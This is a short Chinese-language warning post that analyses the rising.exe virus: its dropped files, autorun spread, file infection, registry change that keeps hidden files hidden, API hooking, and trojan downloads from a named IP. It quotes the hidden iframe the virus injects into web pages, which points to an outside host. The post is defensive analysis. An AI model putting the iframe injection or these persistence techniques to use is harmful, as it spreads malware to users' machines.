新病毒rising.exe大家请注意
新病毒rising.exe 大家请注意
释放xxxxxxxx.EXE xxxxxxxx.dll(随机的8个数字字母组合成的文件名)到系统文件夹
注册服务xxxxxxxx.EXE
xxxxxxxx.EXE控制winlogon进程 使得xxxxxxxx.dll插入几乎所有进程
释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动
感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园
感染 html asp 等文件 在其后面插入代码
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>
修改系统时间 随机把年份往前调 月,日不变
修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:
值为 0x00000000
导致无法显示临时文件
rising.exe 还会hook 多个 API函数 使其进程在任务管理器中隐藏
使用Explorer.exe连接网络 61.152.92.98:80下载木马
下载的木马一般为K117815XXXXX.exe
XXXXX代表随机
到系统文件夹
由于 每台机器上下载的木马的名称不同 但最后结果相同 所以中间释放的过程省略
最后 这些木马运行后分别释放了如下文件
C:\WINDOWS\system32\buchehuo.exe(创建了服务inetsvr)
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
(当前用户)临时文件夹下 释放upxdnd.exe和upxdnd.dll
